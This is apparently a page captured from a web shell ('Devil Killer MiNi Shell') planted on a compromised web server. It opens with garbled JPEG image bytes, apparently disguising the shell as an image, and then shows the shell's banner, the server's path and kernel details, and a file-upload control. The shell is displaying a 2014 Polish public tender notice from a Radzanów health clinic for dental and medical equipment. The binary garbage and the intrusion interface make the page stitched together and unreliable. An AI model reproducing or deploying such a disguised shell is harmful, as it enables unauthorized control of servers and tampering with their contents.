JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140307/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140307/76972-N-2014.html

<p class="kh_header"><b>Radzanów: Zakup sprzętu specjalistycznego</b><br>
<b>Numer ogłoszenia: 76972 - 2014; data zamieszczenia: 07.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , Radzanów 72, 26-807 Radzanów, woj. mazowieckie, tel. 48 613 62 69, faks 48 613 62 69.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bipzozradzanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup sprzętu specjalistycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Fotel stomatologiczny
Przystosowanie do pracy na 4 ręce
Sterowanie elektryczne
Napęd elektromechaniczny.podnoszenie do 175 kg
Funkcja miękkiego startu. pierwsza faza ruchu z obniżoną prędkością
Zagłówek chirurgiczny dwuprzegubowy
Sterowanie ruchami fotela z konsoli lekarza i wyłącznika nożnego
4 programowane pozycje fotela
Pozycja zerowa
Pozycja spluwaczkowa i powrót do ostatniej pozycji pracy
Brak efektu -wyciągania koszuli
Bezszwowa tapicerka odporna na środki dezynfekcyjne
Wyłączniki awaryjne ruchu fotela    szt. 2
Łatwa do samodzielnej wymiany osłona podłokietnika
II. Stolik lekarza
Ramię pantomograficzne
5 rękawów od góry z blokadą w pozycji pracy
Obrotowa tacka
System odprowadzania zużytego oleju
Niski tor ruchu ramion pan tomograficznych narzędzi, nie zaczepia o reflektor
Sterowanie ruchami fotela i unitu
Łatwo zmywalny pulpit sterujący
III. Blok spluwaczki ze ślinociągiem
Zintegrowany z fotelem
Odchylany od pacjenta
Ramię asysty ze ślinociągiem wodnym i rękawami ssakowymi (duży i mały)
Obieg wody destylowanej
Czasowe i regulowane napełnianie kubka i opłukiwanie spluwaczki
IV. Sterownik nożny
Elektryczny z płynną regulacją obrotów mikrosilnika i mocy skalera
Praca końcówki z wodą
Praca końcówki bez wody
Sterowanie ruchami fotela
V. Reflektor ze światłem LED
Mocowany na ramieniu pantomograficznym
Konstrukcja metalowa
Odbłyśnik i  osłona przednia wykonana ze szkła
Uchwyt umożliwiający stosowanie jednorazowych osłonek
VI. Kompresor
Cichy, bezolejowy  z osuszaczem membranowym 
Wydajność  minimum 60 l/min
Zbiornik z wewnętrzną powłoką antybakteryjną
VII. Pompa ssąca
Pracująca w układzie mokrym
Wydajność minimum 300 l.min.
VIII. Wyposażenie
Końcówka turbinowa ze światłem LED
Mikrosilnik elektryczny ze światłem LED
Kątnica mikrosilnika ze światłem LED
Strzykawka trójdrożna
Lampa polimeryzacyjna ze światłem LED
Skaler piezoelektryczny ze światłem LED (minimum 3 końcówki robocze)
Asystor stomatologiczny czteroszufladkowy jezdny, okres gwarancji 24 m-ce montaż sprzętu na istniejących przyłączach, przeszkolenie personelu
Kamera + uchwyt na most lampy + monitor z szybą szklaną i metalowa obudowa
Krzesełko dla stomatologa z podparciem ramiennym
1.4.  Opis przedmiotu zamówienia-  część II -  Wyposażenie
Lampa bezcieniowa jezdna
Napięcie zasilania 230V; 50 Hz
Napięcie żarówki 12V
Moc żarówki 50W
Natężenie światła z odległości 0,8m 65000lx
natężenie światła z odległości 1 m 50000lx
Temperatura barwowa 4000oK
Wielkość plamy świetlnej 130mm
Rodzaj ochrony przed porażeniem elektrycznym I klasa
Waga:
PH-121.2 11 kg
2. Pulsoksymetr
Zintegrowany czujnik i wyświetlacz
Przeznaczony do użycia w szpitalach, przychodniach, przez lekarzy rodzinnych, położne środowiskowe oraz do użytku domowego
Dokładny pomiar wysycenia krwi tlenem (saturacji) oraz częstotliwości tętna
Wyniki pomiarów saturacji oraz tętna podawane w formie cyfrowej oraz jako wykres
6 trybów wyświetlania w 4 kierunkach
Niski pobór prądu
Wskaźnik niskiego poziomu baterii
Niewielkie wymiary (57 x 31 x 32 mm) oraz niska waga sprawiają, że urządzenie jest
wygodne do przenoszenia
Kolorowy wyświetlacz o rozdzielczości 160 x 64 piksele
Zakres pomiarowy saturacji: 35 - 99 %
Zakres pomiarowy częstotliwości tętna 30 - 250 bpm (uderzeń na minutę)
Zasilanie: 2 baterie alkaliczne typu AAA
3. Otoskop
żarówka ksenonowa 2,5 V (3200 K) lub
dioda LED 3,7 V (5500 K),
zapewnia równomierne oświetlenie badanego pola.
Zasilanie: 2 baterie AA
4. Ssak elektryczny
Zasilanie- 230V/50Hz,
Podciśnienie- -75 kPa,
Przepływ ograniczony filtrem- 16l
Waga- 2,5 kg,
Wymiary- 35x21x18cm,
Normy: EN 60601-1; ISO 10079-1
5. Aparat ciśnieniowy holter
możliwość podziału doby na 6 podokresów pomiarowych
pomiar i rejestrację ciśnienia skurczowego, rozkurczowego, średniego krwi oraz częstotliwości rytmu serca
analizę wyników obejmują statystyki: Max., Min., zakres, UQ, LQ, Mediana, Średnie, SD dla ciśnienia
skurczowego, rozkurczowego, średniego oraz częstości rytmu
statystykę dostępną dla całego badania oraz dla każdego z sześciu okresów pomiarowych
rejestrację ciśnienia tętniczego krwi w ciągu tygodnia (500 pomiarów) z dowolnymi odstępami pomiarówautomatyczne określenie zakresu pompowanego ciśnienia
prezentację wyników ostatniego zapisanego pomiaru (na życzenie użytkownika)
pomiar na żądanierozpoczęcie rejestracji poza systemem komputerowym
graficzną i tabelaryczną prezentację wyników pomiarówoprogramowanie do odczytu w komputerze 
6. Inhalator tłokowy
DANE TECHNICZNE SPRĘŻARKI TŁOKOWEJ Z WYŁĄCZNIKIEM TERMICZNYM
Napięcie pracy: 230 V ~ 50 Hz 100 W
Wymiary: 206x168x126 mm Waga: 1,5 kg
Ciągła praca sprężarki: TAK
Klasa ryzyka wg normy MDD 93.42.EEC: IIa
Ciśnienie maksymalne: 1,85 bar/185 kPa
Przepływ powietrza: 10 l.min.
Głośność: 58 dB
Szybkość nebulizacji: 0,35 ml.min. (0,9% roztwór NaCl)
Ciśnienie robocze: 70 kPa (0,7 bar)
Przepływ roboczy: 5 l.min (0,7 bar.70 kPa)
Parametry otoczenia - praca: temperatura: 10 - 40°C,
wilgotność: 10 - 95%
Parametry otoczenia - przechowywanie:
temperatura: -25 - 70°C, wilgotność: 10 - 95%
DANE TECHNICZNE NEBULIZATORA NEBJET
Minimalny przepływ roboczy: 5 l.min +.- 10%
Ciśnienie robocze: 70 kPa (0,7 bara) + - 10%
Maksymalny przepływ roboczy: 7,5 l.min + - 10%
Ciśnienie robocze: 150 kPa (1,5 bara) + - 10%
Objętość terapeutyczna: 75% (wdychana, cząsteczki < 5 ľm)
Szybkość nebulizacji: 0,35 ml/min
Maksymalna pojemność: 12 ml
Minimalna pojemność: 2ml
Objętość pozostająca: 0,7 ml
Warunki przechowywania i transportu:
Temperatura: -20°C (-4°F) ÷ +70°C (158°F) Wilgotność: 5 - 95%
7. Butla tlenowa 3 l
Materiał butli: 34CrMo4
Minimalna grubość ścianki: 2,5 mm
Średnica: 115 mm
Max. ciśnienie napełnienia: 200 bar
Wysokość: ~ 400 mm
Ciężar: ~ 3,9 kg ? 5%
Rodzaj dna: wklęsłe
8. Ławka plastykowa 3-os.
Wysokość: 800 mm
Długość: 1650 mm
stelaż metalowy czarny
siedziska plastykowe w 3 kolorach
9. Ławka plastykowa 2-os.
Wysokość: 800 mm
Długość: 1050 mm
stelaż metalowy czarny
siedziska plastykowe w 3 kolorach
10. Parawan 1-skrzydłowy składany
wysokość: 1900 mm
szerokość: 1000 mm
kolory płótna: biały, zielony, niebieski
11. Reduktor do butli tlenowej
Ciśnienie zredukowane 0,4÷0,5 MPa
Ciśnienie zasilania 2÷15 MPa
Zakres regulacji przepływu 0÷15 l/min
Dokładność ?10% wskazywanej wartości na dozowniku lub 0,5 l.min
Nakrętka z gwintem: 3
Nawilżanie gazu ok. 30% RH
temperatura pracy 5 ÷ 40 °C
Wymiary: 310 x 195 x 105 mm
Masa: 1,8 kg.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje  udzielenie zamówień uzupełniających na roboty występujące w zamówieniu podstawowym, o których mowa w art. 67 ust. 1 pkt. 6 ustawą Pzp do wysokości 20 % wartości zamówienia podstawowego na podstawie odrębnej umowy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 51.41.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od uszczegółowienia wymagań w zakresie tego warunku.
Ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ustawy Prawo zamówień publicznych, stanowiącego Załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje co najmniej jedną  dostawę sprzętu medycznego (dentystycznego) o wartości brutto nie mniejszej niż  50 000,00 zł. (słownie: pięćdziesiąt tysięcy złotych 00/100). - dla pierwszej części zamówienia (unit stomatologiczny). 
Wykonawca musi wykazać, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje co najmniej jedną  dostawę sprzętu medycznego (dentystycznego) o wartości brutto nie mniejszej niż  10 000,00 zł. (słownie: dziesięć tysięcy złotych 00.100). - dla drugiej części zamówienia (wyposażenie). 
Dla wskazanych dostaw Wykonawca zobowiązany jest przedłożyć dowody 
(np. poświadczenia, opinie, referencje) potwierdzające, że dostawy te zostały wykonane należycie lub są wykonywane należycie.(W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia Zamawiający dopuszcza składanie dokumentów wspólnych lub odnoszących się tylko do Wykonawcy spełniającego niniejszy warunek udziału w postępowaniu ).
Z informacji zamieszczonych w Załączniku nr 3 lub z treści załączonych dowodów (np. poświadczeń, opinii, referencji) musi jednoznacznie wynikać, że Wykonawca wykonał lub wykonuje w okresie ostatnich 3 lat wymagane przez Zamawiającego dostawy. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia dzielności jest krótszy - w tym okresie, wraz z podaniem ich  wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane  sporządzony według wzoru stanowiącego Załącznik nr 3 do niniejszej SIWZ  oraz załączeniem dowodów (np. poświadczenia, opinie, referencje) czy dostawy zostały wykonane lub są wykonywane należycie.
Za główne dostawy uważa się dostawy niezbędne do wykazania spełniania warunku w zakresie wiedzy i doświadczenia Wykonawcy określonego w SIWZ.
Dowodami są: poświadczenia, z tym że w odniesieniu do nadal wykonywanych dostaw lub usług  okresowych lub ciągłych poświadczenie, wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt. 1).
-zgodnie z §9 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r.  w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z dnia 19 lutego 2013r., poz. 231), które weszło w życie w dniu 20 lutego 2013r. jest: W postępowaniach o udzielenie zamówienia publicznego wszczynanych w okresie 12 miesięcy od dnia wejścia w życie niniejszego rozporządzenia, wykonawca, w miejsce poświadczeń, o których mowa w § 1 ust. 2 pkt 1 rozporządzenia, może przedkładać dokumenty potwierdzające należyte wykonanie dostaw lub usług oraz wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe ukończenie (np. opinie, referencje), określone w § 1 ust. 1 pkt 2 i 3 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego dostawy wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów (np. poświadczenia, opinie, referencje), o których mowa powyżej.Zgodnie z §9 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r.  w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z dnia 19 lutego 2013r., poz. 231), które weszło w życie w dniu 20 lutego 2013r. jest:
W postępowaniach o udzielenie zamówienia publicznego wszczynanych w okresie 12 miesięcy od dnia wejścia w życie niniejszego rozporządzenia, wykonawca, w miejsce poświadczeń, o których mowa w § 1 ust. 2 pkt 1 rozporządzenia, może przedkładać dokumenty potwierdzające należyte wykonanie dostaw lub usług oraz wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe ukończenie, określone w § 1 ust. 1 pkt 2 i 3 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).W razie konieczności, szczególnie gdy wykaz lub dowody, o których mowa odpowiednio w ust. 1 pkt 2 i 3 ust. 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r., w sprawie rodzajów dokumentów, jakich może żądać zamawiający oraz form jakich te dokumenty mogą być składane, budzą wątpliwości zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego roboty budowlane, dostawy lub usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio zamawiającemu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od uszczegółowienia wymagań w zakresie tego warunku.
Ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ustawy Prawo zamówień publicznych, stanowiącego Załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od uszczegółowienia wymagań w zakresie tego warunku.

Ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ustawy Prawo zamówień publicznych, stanowiącego Załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od uszczegółowienia wymagań w zakresie tego warunku.

Ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ustawy Prawo zamówień publicznych, stanowiącego Załącznik nr 1 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Dla wskazanych dostaw Wykonawca zobowiązany jest przedłożyć dowody 
(np. poświadczenia, opinie, referencje) potwierdzające, że dostawy te zostały wykonane należycie lub są wykonywane należycie.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego Wykonawca zobowiązany jest przedłożyć w ofercie następujące dokumenty:  
Certyfikaty, znaki jakości sprzętu oraz inne dokumenty potwierdzające jakość sprzętu medycznego. 
Ocena spełniania w.w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o oświadczenia i dokumenty wymagane powyżej oraz zamieszczone przez Wykonawcę w ofercie. Z treści załączonych oświadczeń i dokumentów musi wynikać jednoznacznie, iż w.w warunki wykonawca spełnił.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z brzmieniem art. 144 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość zmiany niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w przypadku zmiany ustawowej stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bipzozradzanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny  Zakład Opieki Zdrowotnej  w  Radzanowie 
26 - 807  Radzanów 72.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2014 godzina 10:00, miejsce: W rejestracji  - Samodzielny Publiczny  Zakład Opieki Zdrowotnej  w  Radzanowie 
26 - 807  Radzanów 72.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




